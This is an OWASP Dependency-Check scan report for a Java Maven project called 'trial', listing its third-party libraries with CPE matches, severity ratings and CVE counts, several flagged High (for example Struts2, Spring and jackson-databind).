Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user’s risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report.


Project: trial

com.ntu.4062:trial:0.0.1-SNAPSHOT

Display: Showing Vulnerable Dependencies

| Dependency | CPE | Coordinates | Highest Severity | CVE Count | CPE Confidence | Evidence Count |
|---|---|---|---|---|---|---|
| stax-utils-20060502.jar | | net.java.dev.stax-utils:stax-utils:20060502 | | 0 | | 13 |
| stax-api-1.0.1.jar | | stax:stax-api:1.0.1 | | 0 | | 19 |
| maven-scm-api-1.1.jar | | org.apache.maven.scm:maven-scm-api:1.1 | | 0 | | 23 |
| aopalliance-1.0.jar | | aopalliance:aopalliance:1.0 | | 0 | | 17 |
| spring-core-2.5.6.jar | cpe:/a:vmware:springsource_spring_framework:2.5.6; cpe:/a:pivotal_software:spring_framework:2.5.6; cpe:/a:springsource:spring_framework:2.5.6; cpe:/a:pivotal:spring_framework:2.5.6 | org.springframework:spring-core:2.5.6 | High | 11 | Highest | 28 |
| plexus-spring-1.2.jar | | org.codehaus.plexus:plexus-spring:1.2 | | 0 | | 22 |
| geronimo-spec-jta-1.0.1B-rc2.jar | cpe:/a:apache:geronimo:1.0.1 | geronimo-spec:geronimo-spec-jta:1.0.1B-rc2 | High | 2 | Low | 14 |
| jdo2-api-2.0.jar | | javax.jdo:jdo2-api:2.0 | | 0 | | 19 |
| plexus-jdo2-1.0-alpha-8.jar | | org.codehaus.plexus:plexus-jdo2:1.0-alpha-8 | | 0 | | 22 |
| maven-settings-2.0.9.jar | | org.apache.maven:maven-settings:2.0.9 | | 0 | | 21 |
| maven-profile-2.0.9.jar | | org.apache.maven:maven-profile:2.0.9 | | 0 | | 21 |
| maven-plugin-registry-2.0.9.jar | | org.apache.maven:maven-plugin-registry:2.0.9 | | 0 | | 21 |
| maven-project-2.0.9.jar | | org.apache.maven:maven-project:2.0.9 | | 0 | | 23 |
| maven-model-2.0.9.jar | | org.apache.maven:maven-model:2.0.9 | | 0 | | 23 |
| maven-artifact-2.0.9.jar | | org.apache.maven:maven-artifact:2.0.9 | | 0 | | 21 |
| maven-repository-metadata-2.0.9.jar | | org.apache.maven:maven-repository-metadata:2.0.9 | | 0 | | 23 |
| wagon-provider-api-1.0-beta-2.jar | | org.apache.maven.wagon:wagon-provider-api:1.0-beta-2 | | 0 | | 23 |
| maven-artifact-manager-2.0.9.jar | | org.apache.maven:maven-artifact-manager:2.0.9 | | 0 | | 21 |
| maven-scm-provider-accurev-1.1.jar | | org.apache.maven.scm:maven-scm-provider-accurev:1.1 | | 0 | | 23 |
| maven-scm-provider-git-commons-1.1.jar | | org.apache.maven.scm:maven-scm-provider-git-commons:1.1 | | 0 | | 23 |
| maven-scm-provider-gitexe-1.1.jar | | org.apache.maven.scm:maven-scm-provider-gitexe:1.1 | | 0 | | 23 |
| maven-scm-provider-vss-1.1.jar | | org.apache.maven.scm:maven-scm-provider-vss:1.1 | | 0 | | 23 |
| maven-scm-provider-cvs-commons-1.1.jar | | org.apache.maven.scm:maven-scm-provider-cvs-commons:1.1 | | 0 | | 23 |
| maven-scm-provider-svn-commons-1.1.jar | | org.apache.maven.scm:maven-scm-provider-svn-commons:1.1 | | 0 | | 23 |
| spring-web-2.5.1.jar | cpe:/a:vmware:springsource_spring_framework:2.5.1; cpe:/a:pivotal:spring_framework:2.5.1; cpe:/a:pivotal_software:spring_framework:2.5.1; cpe:/a:springsource:spring_framework:2.5.1 | org.springframework:spring-web:2.5.1 | High | 11 | Highest | 32 |
| xmlrpc-server-3.1.jar | cpe:/a:apache:xml-rpc:3.1.3 | org.apache.xmlrpc:xmlrpc-server:3.1 | High | 1 | Low | 22 |
| atlassian-xmlrpc-binder-server-spring-0.8.2.jar | cpe:/a:apache:xml-rpc:0.8.2 | com.atlassian.xmlrpc:atlassian-xmlrpc-binder-server-spring:0.8.2 | | 0 | Low | 22 |
| ws-commons-util-1.0.2.jar | cpe:/a:ws_project:ws:1.0.2 | org.apache.ws.commons.util:ws-commons-util:1.0.2 | Medium | 1 | Low | 25 |
| atlassian-xmlrpc-binder-support-0.8.2.jar | | com.atlassian.xmlrpc:atlassian-xmlrpc-binder-support:0.8.2 | | 0 | | 20 |
| atlassian-xmlrpc-binder-server-0.8.2.jar | | com.atlassian.xmlrpc:atlassian-xmlrpc-binder-server:0.8.2 | | 0 | | 20 |
| atlassian-xmlrpc-binder-annotations-0.8.2.jar | | com.atlassian.xmlrpc:atlassian-xmlrpc-binder-annotations:0.8.2 | | 0 | | 20 |
| atlassian-xmlrpc-binder-0.8.2.jar | | com.atlassian.xmlrpc:atlassian-xmlrpc-binder:0.8.2 | | 0 | | 20 |
| slf4j-log4j12-1.5.0.jar | cpe:/a:slf4j:slf4j:1.5.0 | org.slf4j:slf4j-log4j12:1.5.0 | | 0 | Low | 28 |
| maven-plugin-api-2.0.jar | | org.apache.maven:maven-plugin-api:2.0 | | 0 | | 30 |
| maven-shared-io-1.0.jar | | org.apache.maven.shared:maven-shared-io:1.0 | | 0 | | 23 |
| file-management-1.1.jar | | org.apache.maven.shared:file-management:1.1 | | 0 | | 23 |
| plexus-utils-1.5.4.jar | | org.codehaus.plexus:plexus-utils:1.5.4 | | 0 | | 11 |
| plexus-classworlds-1.2-alpha-7.jar | | org.codehaus.plexus:plexus-classworlds:1.2-alpha-7 | | 0 | | 22 |
| junit-3.8.1.jar | | junit:junit:3.8.1 | | 0 | | 19 |
| plexus-component-api-1.0-alpha-19.jar | | org.codehaus.plexus:plexus-component-api:1.0-alpha-19 | | 0 | | 19 |
| backport-util-concurrent-3.0.jar | | backport-util-concurrent:backport-util-concurrent:3.0 | | 0 | | 24 |
| plexus-taskqueue-1.0-alpha-8.jar | | org.codehaus.plexus:plexus-taskqueue:1.0-alpha-8 | | 0 | | 22 |
| plexus-action-1.0-alpha-6.jar | | org.codehaus.plexus:plexus-action:1.0-alpha-6 | | 0 | | 24 |
| plexus-command-line-1.0-alpha-2.jar | | org.codehaus.plexus:plexus-command-line:1.0-alpha-2 | | 0 | | 24 |
| plexus-interactivity-api-1.0-alpha-6.jar | | org.codehaus.plexus:plexus-interactivity-api:1.0-alpha-6 | | 0 | | 22 |
| maven-scm-manager-plexus-1.0.jar | | org.apache.maven.scm:maven-scm-manager-plexus:1.0 | | 0 | | 21 |
| regexp-1.3.jar | | regexp:regexp:1.3 | | 0 | | 11 |
| maven-scm-provider-bazaar-1.0.jar | | org.apache.maven.scm:maven-scm-provider-bazaar:1.0 | | 0 | | 21 |
| maven-scm-provider-clearcase-1.0.jar | | org.apache.maven.scm:maven-scm-provider-clearcase:1.0 | | 0 | | 21 |
| maven-scm-provider-cvsexe-1.0.jar | | org.apache.maven.scm:maven-scm-provider-cvsexe:1.0 | | 0 | | 21 |
| cvsclient-20060125.jar | | org.netbeans.lib:cvsclient:20060125 | | 0 | | 15 |
| ganymed-ssh2-build210.jar | | ch.ethz.ganymed:ganymed-ssh2:build210 | | 0 | | 18 |
| maven-scm-provider-cvsjava-1.0.jar | | org.apache.maven.scm:maven-scm-provider-cvsjava:1.0 | | 0 | | 21 |
| maven-scm-provider-hg-1.0.jar | | org.apache.maven.scm:maven-scm-provider-hg:1.0 | | 0 | | 21 |
| maven-scm-provider-perforce-1.0.jar | | org.apache.maven.scm:maven-scm-provider-perforce:1.0 | | 0 | | 21 |
| maven-scm-provider-starteam-1.0.jar | | org.apache.maven.scm:maven-scm-provider-starteam:1.0 | | 0 | | 21 |
| maven-scm-provider-svnexe-1.0.jar | | org.apache.maven.scm:maven-scm-provider-svnexe:1.0 | | 0 | | 21 |
| maven-scm-provider-synergy-1.0.jar | | org.apache.maven.scm:maven-scm-provider-synergy:1.0 | | 0 | | 21 |
| jdom-1.0.jar | | jdom:jdom:1.0 | | 0 | | 29 |
| jaxen-1.1-beta-8.jar | | jaxen:jaxen:1.1-beta-8 | | 0 | | 24 |
| maven-release-manager-1.0-alpha-3.jar | | org.apache.maven.release:maven-release-manager:1.0-alpha-3 | | 0 | | 23 |
| slf4j-api-1.5.6.jar | cpe:/a:slf4j:slf4j:1.5.6 | org.slf4j:slf4j-api:1.5.6 | | 0 | Low | 28 |
| jsr250-api-1.0.jar | | javax.annotation:jsr250-api:1.0 | | 0 | | 17 |
| continuum-buildagent-core-1.3.2.jar | cpe:/a:apache:continuum:1.3.2 | org.apache.continuum:continuum-buildagent-core:1.3.2 | | 0 | Low | 23 |
| lz4-1.1.2.jar | | net.jpountz.lz4:lz4:1.1.2 | | 0 | | 19 |
| asm-3.3.jar | | asm:asm:3.3 | | 0 | | 15 |
| asm-tree-3.3.jar | | asm:asm-tree:3.3 | | 0 | | 15 |
| asm-commons-3.3.jar | | asm:asm-commons:3.3 | | 0 | | 15 |
| xwork-core-2.3.24.jar | | org.apache.struts.xwork:xwork-core:2.3.24 | | 0 | | 28 |
| freemarker-2.3.22.jar | | org.freemarker:freemarker:2.3.22 | | 0 | | 33 |
| javassist-3.11.0.GA.jar | | javassist:javassist:3.11.0.GA | | 0 | | 16 |
| ognl-3.0.6.jar | cpe:/a:ognl_project:ognl:3.0.6 | ognl:ognl:3.0.6 | Medium | 1 | Low | 19 |
| commons-fileupload-1.3.1.jar | cpe:/a:apache:commons_fileupload:1.3.1 | commons-fileupload:commons-fileupload:1.3.1 | High | 2 | Highest | 33 |
| commons-io-2.2.jar | | commons-io:commons-io:2.2 | | 0 | | 33 |
| struts2-core-2.3.24.jar | cpe:/a:apache:struts:2.3.24 | org.apache.struts:struts2-core:2.3.24 | High | 21 | Highest | 28 |
| commons-collections4-4.1.jar | cpe:/a:apache:commons_collections:4.1 | org.apache.commons:commons-collections4:4.1 | | 0 | Low | 36 |
| wicket-core-7.10.0.jar | cpe:/a:apache:wicket:7.10.0 | org.apache.wicket:wicket-core:7.10.0 | | 0 | Low | 32 |
| findbugs-annotations-1.3.9-1.jar | | com.github.stephenc.findbugs:findbugs-annotations:1.3.9-1 | | 0 | | 21 |
| jgroups-3.6.10.Final.jar | | org.jgroups:jgroups:3.6.10.Final | | 0 | | 29 |
| antlr-2.7.7.jar | | antlr:antlr:2.7.7 | | 0 | | 15 |
| jackson-annotations-2.8.6.jar | cpe:/a:fasterxml:jackson:2.8.6 | com.fasterxml.jackson.core:jackson-annotations:2.8.6 | | 0 | Low | 36 |
| jackson-databind-2.8.6.jar | cpe:/a:fasterxml:jackson:2.8.6; cpe:/a:fasterxml:jackson-databind:2.8.6 | com.fasterxml.jackson.core:jackson-databind:2.8.6 | High | 5 | Highest | 36 |
| commons-lang-2.6.jar | | commons-lang:commons-lang:2.6 | | 0 | | 31 |
| fastutil-7.1.0.jar | | it.unimi.dsi:fastutil:7.1.0 | | 0 | | 19 |
| javax.transaction-api-1.2.jar | | javax.transaction:javax.transaction-api:1.2 | | 0 | | 35 |
| javax.resource-api-1.7.jar | | javax.resource:javax.resource-api:1.7 | | 0 | | 35 |
| jna-4.0.0.jar | | net.java.dev.jna:jna:4.0.0 | | 0 | | 27 |
| jopt-simple-5.0.3.jar | | net.sf.jopt-simple:jopt-simple:5.0.3 | | 0 | | 19 |
| log4j-core-2.7.jar | cpe:/a:apache:log4j:2.7 | org.apache.logging.log4j:log4j-core:2.7 | High | 1 | Highest | 34 |
| shiro-core-1.3.2.jar | cpe:/a:apache:shiro:1.3.2 | org.apache.shiro:shiro-core:1.3.2 | | 0 | Low | 28 |
| commons-beanutils-1.9.3.jar | cpe:/a:apache:commons_beanutils:1.9.3 | commons-beanutils:commons-beanutils:1.9.3 | | 0 | Low | 37 |
| fast-classpath-scanner-2.0.11.jar | | io.github.lukehutch:fast-classpath-scanner:2.0.11 | | 0 | | 27 |
| geode-core-1.2.1.jar | cpe:/a:apache:geode:1.2.1 | org.apache.geode:geode-core:1.2.1 | High | 7 | Highest | 18 |
| javax.persistence-2.1.0.jar | | org.eclipse.persistence:javax.persistence:2.1.0 | | 0 | | 30 |
| commonj.sdo-2.1.1.jar | | org.eclipse.persistence:commonj.sdo:2.1.1 | | 0 | | 24 |
| eclipselink-2.5.2.jar | | org.eclipse.persistence:eclipselink:2.5.2 | | 0 | | 25 |
| gateway-i18n-logging-log4j-0.10.0.jar | cpe:/a:apache:log4j:0.10.0 | org.apache.knox:gateway-i18n-logging-log4j:0.10.0 | | 0 | Low | 23 |
| apacheds-i18n-2.0.0-M5.jar | | org.apache.directory.server:apacheds-i18n:2.0.0-M5 | | 0 | | 30 |
| apacheds-jdbm-2.0.0-M5.jar | | org.apache.directory.server:apacheds-jdbm:2.0.0-M5 | | 0 | | 30 |
| json-smart-1.3.1.jar | | net.minidev:json-smart:1.3.1 | | 0 | | 21 |
| nimbus-jose-jwt-4.11.jar | cpe:/a:connect2id:nimbus_jose%2bjwt:4.11 | com.nimbusds:nimbus-jose-jwt:4.11 | Medium | 3 | Highest | 40 |
| json-path-0.9.1.jar | | com.jayway.jsonpath:json-path:0.9.1 | | 0 | | 22 |
| gateway-spi-0.10.0.jar | cpe:/a:apache:knox:0.10.0 | org.apache.knox:gateway-spi:0.10.0 | Medium | 1 | Highest | 23 |
| hadoop-auth-2.2.0.jar | cpe:/a:apache:hadoop:2.2.0 | org.apache.hadoop:hadoop-auth:2.2.0 | High | 7 | Highest | 23 |
| javax.servlet-api-3.1.0.jar | | javax.servlet:javax.servlet-api:3.1.0 | | 0 | | 33 |
| httpclient-4.5.1.jar | cpe:/a:apache:httpclient:4.5.1 | org.apache.httpcomponents:httpclient:4.5.1 | | 0 | Low | 29 |
| shiro-web-1.2.3.jar | cpe:/a:apache:shiro:1.2.3 | org.apache.shiro:shiro-web:1.2.3 | Medium | 1 | Low | 28 |
| commons-codec-1.7.jar | | commons-codec:commons-codec:1.7 | | 0 | | 33 |
| oro-2.0.8.jar | | oro:oro:2.0.8 | | 0 | | 11 |
| commons-net-1.4.1.jar | | commons-net:commons-net:1.4.1 | | 0 | | 23 |
| cglib-2.2.2.jar | | cglib:cglib:2.2.2 | | 0 | | 19 |
| commons-digester3-3.2.jar | | org.apache.commons:commons-digester3:3.2 | | 0 | | 34 |
| commons-cli-1.2.jar | | commons-cli:commons-cli:1.2 | | 0 | | 31 |
| shrinkwrap-api-1.2.3.jar | | org.jboss.shrinkwrap:shrinkwrap-api:1.2.3 | | 0 | | 28 |
| shrinkwrap-spi-1.2.3.jar | | org.jboss.shrinkwrap:shrinkwrap-spi:1.2.3 | | 0 | | 28 |
| shrinkwrap-impl-base-1.2.3.jar | | org.jboss.shrinkwrap:shrinkwrap-impl-base:1.2.3 | | 0 | | 28 |
| shrinkwrap-descriptors-api-base-2.0.0-alpha-8.jar | | org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-api-base:2.0.0-alpha-8 | | 0 | | 29 |
| shrinkwrap-descriptors-api-javaee-2.0.0-alpha-8.jar | | org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-api-javaee:2.0.0-alpha-8 | | 0 | | 29 |
| shrinkwrap-descriptors-spi-2.0.0-alpha-8.jar | | org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-spi:2.0.0-alpha-8 | | 0 | | 29 |
| shrinkwrap-descriptors-impl-base-2.0.0-alpha-8.jar | | org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-impl-base:2.0.0-alpha-8 | | 0 | | 29 |
| shrinkwrap-descriptors-impl-javaee-2.0.0-alpha-8.jar | | org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-impl-javaee:2.0.0-alpha-8 | | 0 | | 29 |
| jericho-html-3.2.jar | | net.htmlparser.jericho:jericho-html:3.2 | | 0 | | 19 |
| zip4j-1.3.2.jar | | net.lingala.zip4j:zip4j:1.3.2 | | 0 | | 13 |
| joda-time-2.9.2.jar | | joda-time:joda-time:2.9.2 | | 0 | | 33 |
| jetty-jndi-9.2.15.v20160210.jar | cpe:/a:jetty:jetty:9.2.15.v20160210; cpe:/a:eclipse:jetty:9.2.15.v20160210 | org.eclipse.jetty:jetty-jndi:9.2.15.v20160210 | High | 4 | Low | 34 |
| javax.annotation-api-1.2.jar | | javax.annotation:javax.annotation-api:1.2 | | 0 | | 35 |
| jetty-schemas-3.1.M0.jar | | org.eclipse.jetty.toolchain:jetty-schemas:3.1.M0 | | 0 | | 24 |
| apache-el-8.0.9.M3.jar | cpe:/a:apache_tomcat:apache_tomcat:8.0.9.m3 | org.mortbay.jasper:apache-el:8.0.9.M3 | | 0 | Low | 24 |
| apache-jsp-8.0.9.M3.jar | cpe:/a:apache_tomcat:apache_tomcat:8.0.9.m3; cpe:/a:jasper_project:jasper:8.0.9.m3 | org.mortbay.jasper:apache-jsp:8.0.9.M3 | | 0 | Low | 24 |
| org.eclipse.jdt.core-3.8.2.v20130121.jar | cpe:/a:eclipse:jetty:3.8.2.v20130121; cpe:/a:jetty:jetty:3.8.2.v20130121 | org.eclipse.jetty.orbit:org.eclipse.jdt.core:3.8.2.v20130121 | High | 4 | Low | 21 |
| apache-jsp-9.2.15.v20160210.jar | cpe:/a:jetty:jetty:9.2.15.v20160210; cpe:/a:eclipse:jetty:9.2.15.v20160210 | org.eclipse.jetty:apache-jsp:9.2.15.v20160210 | High | 4 | Low | 36 |
| taglibs-standard-spec-1.2.1.jar | cpe:/a:apache:standard_taglibs:1.2.1 | org.apache.taglibs:taglibs-standard-spec:1.2.1 | High | 1 | Highest | 28 |
| apache-jstl-9.2.15.v20160210.jar | cpe:/a:apache_tomcat:apache_tomcat:9.2.15.v20160210 | org.eclipse.jetty:apache-jstl:9.2.15.v20160210 | | 0 | Low | 21 |
| websocket-common-9.2.15.v20160210.jar | cpe:/a:jetty:jetty:9.2.15.v20160210; cpe:/a:eclipse:jetty:9.2.15.v20160210 | org.eclipse.jetty.websocket:websocket-common:9.2.15.v20160210 | High | 4 | Low | 30 |
| websocket-api-9.2.15.v20160210.jar | | org.eclipse.jetty.websocket:websocket-api:9.2.15.v20160210 | | 0 | | 30 |
| javax.websocket-api-1.1.jar | | javax.websocket:javax.websocket-api:1.1 | | 0 | | 26 |
| javax-websocket-server-impl-9.2.15.v20160210.jar | cpe:/a:jetty:jetty:9.2.15.v20160210; cpe:/a:eclipse:jetty:9.2.15.v20160210 | org.eclipse.jetty.websocket:javax-websocket-server-impl:9.2.15.v20160210 | High | 4 | Low | 34 |
| onos-core-dist-1.13.1.jar | cpe:/a:onosproject:onos:1.13.1 | org.onosproject:onos-core-dist:1.13.1 | High | 3 | Highest | 22 |
| asm-5.0.4.jar | | org.ow2.asm:asm:5.0.4 | | 0 | | 25 |
| commons-collections-3.2.2.jar | cpe:/a:apache:commons_collections:3.2.2 | commons-collections:commons-collections:3.2.2 | | 0 | Low | 37 |
| commons-configuration-1.10.jar | | commons-configuration:commons-configuration:1.10 | | 0 | | 33 |
| commons-lang3-3.6.jar | | org.apache.commons:commons-lang3:3.6 | | 0 | | 38 |
| commons-logging-1.2.jar | | commons-logging:commons-logging:1.2 | | 0 | | 33 |
| commons-math3-3.6.1.jar | | org.apache.commons:commons-math3:3.6.1 | | 0 | | 38 |
| commons-pool-1.6.jar | | commons-pool:commons-pool:1.6 | | 0 | | 33 |
| concurrent-trees-2.6.1.jar | | com.googlecode.concurrent-trees:concurrent-trees:2.6.1 | | 0 | | 20 |
| error_prone_annotations-2.0.18.jar | | com.google.errorprone:error_prone_annotations:2.0.18 | | 0 | | 20 |
| j2objc-annotations-1.1.jar | | com.google.j2objc:j2objc-annotations:1.1 | | 0 | | 20 |
| animal-sniffer-annotations-1.14.jar | | org.codehaus.mojo:animal-sniffer-annotations:1.14 | | 0 | | 21 |
| guava-22.0.jar | cpe:/a:google:guava:22.0 | com.google.guava:guava:22.0 | Medium | 1 | Highest | 26 |
| jackson-core-2.9.5.jar | cpe:/a:fasterxml:jackson:2.9.5 | com.fasterxml.jackson.core:jackson-core:2.9.5 | | 0 | Low | 38 |
| javax.ws.rs-api-2.1.jar | cpe:/a:ws_project:ws:2.1 | javax.ws.rs:javax.ws.rs-api:2.1 | | 0 | Low | 35 |
| osgi-resource-locator-1.0.1.jar | | org.glassfish.hk2:osgi-resource-locator:1.0.1 | | 0 | | 24 |
| jersey-common-2.26.jar | | org.glassfish.jersey.core:jersey-common:2.26 | | 0 | | 26 |
| jersey-client-2.26.jar | | org.glassfish.jersey.core:jersey-client:2.26 | | 0 | | 26 |
| jersey-media-jaxb-2.26.jar | | org.glassfish.jersey.media:jersey-media-jaxb:2.26 | | 0 | | 26 |
| javax.inject-2.5.0-b42.jar | | org.glassfish.hk2.external:javax.inject:2.5.0-b42 | | 0 | | 24 |
| validation-api-1.1.0.Final.jar | | javax.validation:validation-api:1.1.0.Final | | 0 | | 19 |
| jersey-server-2.26.jar | | org.glassfish.jersey.core:jersey-server:2.26 | | 0 | | 26 |
| jsr305-3.0.1.jar | | com.google.code.findbugs:jsr305:3.0.1 | | 0 | | 20 |
| kryo-4.0.1.jar | | com.esotericsoftware:kryo:4.0.1 | | 0 | | 21 |
| metrics-core-3.2.2.jar | | io.dropwizard.metrics:metrics-core:3.2.2 | | 0 | | 22 |
| metrics-json-3.2.2.jar | | io.dropwizard.metrics:metrics-json:3.2.2 | | 0 | | 22 |
| minlog-1.3.0.jar | | com.esotericsoftware:minlog:1.3.0 | | 0 | | 26 |
| netty-3.10.5.Final.jar | cpe:/a:netty_project:netty:3.10.5 | io.netty:netty:3.10.5.Final | | 0 | Low | 25 |
| netty-transport-4.1.8.Final.jar | cpe:/a:netty_project:netty:4.1.8 | io.netty:netty-transport:4.1.8.Final | | 0 | Low | 27 |
| objenesis-2.6.jar | | org.objenesis:objenesis:2.6 | | 0 | | 34 |
| org.apache.felix.scr-1.8.2.jar | | org.apache.felix:org.apache.felix.scr:1.8.2 | | 0 | | 25 |
| org.apache.felix.scr.annotations-1.9.12.jar | | org.apache.felix:org.apache.felix.scr.annotations:1.9.12 | | 0 | | 24 |
| jansi-1.11.jar | | org.fusesource.jansi:jansi:1.11 | | 0 | | 21 |
| jline-2.13.jar | | jline:jline:2.13 | | 0 | | 17 |
| org.apache.felix.fileinstall-3.5.2.jar | | org.apache.felix:org.apache.felix.fileinstall:3.5.2 | | 0 | | 33 |
| sshd-core-0.14.0.jar | | org.apache.sshd:sshd-core:0.14.0 | | 0 | | 30 |
| org.apache.karaf.system.core-3.0.8.jar | cpe:/a:apache:karaf:3.0.8 | org.apache.karaf.system:org.apache.karaf.system.core:3.0.8 | Low | 1 | Low | 31 |
| xml-apis-1.0.b2.jar | | xml-apis:xml-apis:1.0.b2 | | 0 | | 32 |
| org.apache.servicemix.bundles.dom4j-1.6.1_5.jar | cpe:/a:dom4j_project:dom4j:1.6.1.5 | org.apache.servicemix.bundles:org.apache.servicemix.bundles.dom4j:1.6.1_5 | | 0 | Low | 25 |
| org.osgi.compendium-5.0.0.jar | | org.osgi:org.osgi.compendium:5.0.0 | | 0 | | 28 |
| org.osgi.core-5.0.0.jar | | org.osgi:org.osgi.core:5.0.0 | | 0 | | 28 |
| reflectasm-1.11.0.jar | | com.esotericsoftware:reflectasm:1.11.0 | | 0 | | 22 |
| onlab-misc-1.13.1.jar | cpe:/a:onosproject:onos:1.13.1 | org.onosproject:onlab-misc:1.13.1 | High | 3 | Highest | 20 |
| lucene-analyzers-common-7.0.1.jar | | org.apache.lucene:lucene-analyzers-common:7.0.1 | | 0 | | 23 |
| lucene-analyzers-kuromoji-7.0.1.jar | | org.apache.lucene:lucene-analyzers-kuromoji:7.0.1 | | 0 | | 23 |
| lucene-analyzers-phonetic-7.0.1.jar | | org.apache.lucene:lucene-analyzers-phonetic:7.0.1 | | 0 | | 23 |
| lucene-backward-codecs-7.0.1.jar | | org.apache.lucene:lucene-backward-codecs:7.0.1 | | 0 | | 23 |
| lucene-classification-7.0.1.jar | | org.apache.lucene:lucene-classification:7.0.1 | | 0 | | 23 |
| lucene-codecs-7.0.1.jar | | org.apache.lucene:lucene-codecs:7.0.1 | | 0 | | 23 |
| lucene-core-7.0.1.jar | | org.apache.lucene:lucene-core:7.0.1 | | 0 | | 23 |
| lucene-expressions-7.0.1.jar | | org.apache.lucene:lucene-expressions:7.0.1 | | 0 | | 23 |
| lucene-grouping-7.0.1.jar | | org.apache.lucene:lucene-grouping:7.0.1 | | 0 | | 23 |
| lucene-highlighter-7.0.1.jar | | org.apache.lucene:lucene-highlighter:7.0.1 | | 0 | | 23 |
| lucene-join-7.0.1.jar | | org.apache.lucene:lucene-join:7.0.1 | | 0 | | 23 |
| lucene-memory-7.0.1.jar | | org.apache.lucene:lucene-memory:7.0.1 | | 0 | | 23 |
| lucene-misc-7.0.1.jar | | org.apache.lucene:lucene-misc:7.0.1 | | 0 | | 23 |
| lucene-queries-7.0.1.jar | | org.apache.lucene:lucene-queries:7.0.1 | | 0 | | 23 |
| lucene-queryparser-7.0.1.jar | | org.apache.lucene:lucene-queryparser:7.0.1 | | 0 | | 23 |
| lucene-sandbox-7.0.1.jar | | org.apache.lucene:lucene-sandbox:7.0.1 | | 0 | | 23 |
| lucene-spatial-extras-7.0.1.jar | | org.apache.lucene:lucene-spatial-extras:7.0.1 | | 0 | | 23 |
| lucene-suggest-7.0.1.jar | | org.apache.lucene:lucene-suggest:7.0.1 | | 0 | | 23 |
| hppc-0.7.1.jar | | com.carrotsearch:hppc:0.7.1 | | 0 | | 20 |
| jackson-dataformat-smile-2.5.4.jar | cpe:/a:fasterxml:jackson:2.5.4 | com.fasterxml.jackson.dataformat:jackson-dataformat-smile:2.5.4 | | 0 | Low | 36 |
| caffeine-2.4.0.jar | | com.github.ben-manes.caffeine:caffeine:2.4.0 | | 0 | | 20 |
| protobuf-java-3.1.0.jar | cpe:/a:google:protobuf:3.1.0 | com.google.protobuf:protobuf-java:3.1.0 | Medium | 1 | Highest | 26 |
| t-digest-3.1.jar | | com.tdunning:t-digest:3.1 | | 0 | | 20 |
| dom4j-1.6.1.jar | cpe:/a:dom4j_project:dom4j:1.6.1 | dom4j:dom4j:1.6.1 | Medium | 1 | Highest | 25 |
| gmetric4j-1.0.7.jar | | info.ganglia.gmetric4j:gmetric4j:1.0.7 | | 0 | | 20 |
| metrics-ganglia-3.2.2.jar | | io.dropwizard.metrics:metrics-ganglia:3.2.2 | | 0 | | 22 |
| metrics-graphite-3.2.2.jar | cpe:/a:graphite_project:graphite:3.2.2 | io.dropwizard.metrics:metrics-graphite:3.2.2 | | 0 | Low | 22 |
| metrics-jetty9-3.2.2.jar | cpe:/a:jetty:jetty:3.2.2 | io.dropwizard.metrics:metrics-jetty9:3.2.2 | | 0 | Low | 22 |
| metrics-jvm-3.2.2.jar | | io.dropwizard.metrics:metrics-jvm:3.2.2 | | 0 | | 22 |
| log4j-1.2.17.jar | cpe:/a:apache:log4j:1.2.17 | log4j:log4j:1.2.17 | | 0 | Low | 27 |
| eigenbase-properties-1.1.5.jar | | net.hydromatic:eigenbase-properties:1.1.5 | | 0 | | 27 |
| antlr4-runtime-4.5.1-1.jar | | org.antlr:antlr4-runtime:4.5.1-1 | | 0 | | 30 |
| calcite-core-1.13.0.jar | | org.apache.calcite:calcite-core:1.13.0 | | 0 | | 25 |
| calcite-linq4j-1.13.0.jar | | org.apache.calcite:calcite-linq4j:1.13.0 | | 0 | | 25 |
| avatica-core-1.10.0.jar | | org.apache.calcite.avatica:avatica-core:1.10.0 | | 0 | | 25 |
| commons-exec-1.3.jar | | org.apache.commons:commons-exec:1.3 | | 0 | | 36 |
| curator-client-2.8.0.jar | | org.apache.curator:curator-client:2.8.0 | | 0 | | 24 |
| curator-framework-2.8.0.jar | cpe:/a:apache:zookeeper:2.8.0 | org.apache.curator:curator-framework:2.8.0 | Medium | 2 | Low | 24 |
| curator-recipes-2.8.0.jar | | org.apache.curator:curator-recipes:2.8.0 | | 0 | | 24 |
| hadoop-hdfs-2.7.4.jar | cpe:/a:apache:hadoop:2.7.4 | org.apache.hadoop:hadoop-hdfs:2.7.4 | Medium | 1 | Highest | 22 |
| htrace-core-3.2.0-incubating.jar | cpe:/a:fasterxml:jackson:3.2.0 | org.apache.htrace:htrace-core:3.2.0-incubating | | 0 | Low | 18 |
| httpcore-4.4.1.jar | | org.apache.httpcomponents:httpcore:4.4.1 | | 0 | | 29 |
| httpmime-4.4.1.jar | | org.apache.httpcomponents:httpmime:4.4.1 | | 0 | | 29 |
| zookeeper-3.4.10.jar | cpe:/a:apache:zookeeper:3.4.10 | org.apache.zookeeper:zookeeper:3.4.10 | Medium | 1 | Low | 20 |
| jackson-core-asl-1.9.13.jar | cpe:/a:fasterxml:jackson:1.9.13 | org.codehaus.jackson:jackson-core-asl:1.9.13 | | 0 | Low | 29 |
| commons-compiler-2.7.6.jar | | org.codehaus.janino:commons-compiler:2.7.6 | | 0 | | 20 |
| janino-2.7.6.jar | | org.codehaus.janino:janino:2.7.6 | | 0 | | 25 |
| stax2-api-3.1.4.jar | | org.codehaus.woodstox:stax2-api:3.1.4 | | 0 | | 26 |
| woodstox-core-asl-4.4.1.jar | | org.codehaus.woodstox:woodstox-core-asl:4.4.1 | | 0 | | 29 |
| jetty-io-9.3.14.v20161028.jar | | org.eclipse.jetty:jetty-io:9.3.14.v20161028 | | 0 | | 36 |
| jetty-jmx-9.3.14.v20161028.jar | cpe:/a:jetty:jetty:9.3.14.v20161028; cpe:/a:eclipse:jetty:9.3.14.v20161028 | org.eclipse.jetty:jetty-jmx:9.3.14.v20161028 | Medium | 1 | Low | 38 |
